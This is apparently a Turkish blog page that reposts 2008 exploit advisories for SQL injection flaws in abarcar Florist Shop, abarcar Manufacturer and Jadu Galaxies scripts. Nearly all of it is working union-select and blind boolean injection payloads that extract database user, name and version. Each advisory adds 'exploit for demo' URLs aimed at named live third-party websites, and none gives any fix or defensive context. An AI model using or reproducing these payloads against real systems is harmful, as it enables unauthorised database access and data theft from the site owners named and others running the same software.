abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj
link: http://packetstormsecurity.org/0812-exploits/abarcarflorist-sql.txt
link: http://www.experl.com/abarcar-florist-shop-system-script-contentphp-cat-blind-remote-sql-inj-352/
Discovered By: ZoRLu
Exploit: ( remote )
http://localhost/script_path/content.php?cat=[SQL]
[SQL]=
-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
exploit for demo: ( you must look title )
http://www.angelstouch.com/content.php?cat=-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
Exploit: ( blind )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
blind sql injection etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
blind sql injection etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
31 Aralık 2008 Çarşamba
abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj
abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj
link: http://packetstormsecurity.org/0812-exploits/abarcarmanu-sql.txt
link: http://www.experl.com/abarcar-manufacturer-system-script-plistingsphp-listingid-blind-remote-sql-inj-353/
Discovered By: ZoRLu
Exploit: ( remote )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=[SQL]
[SQL]=
-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--
exploit for demo:
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--
Exploit: ( blind )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )
18 Kasım 2008 Salı
Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability
Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7144
Discovered By: ZoRLu
exploit for demo:
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
link: http://www.milw0rm.com/exploits/7144
Discovered By: ZoRLu
exploit for demo:
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
Kaydol:
Kayıtlar (Atom)
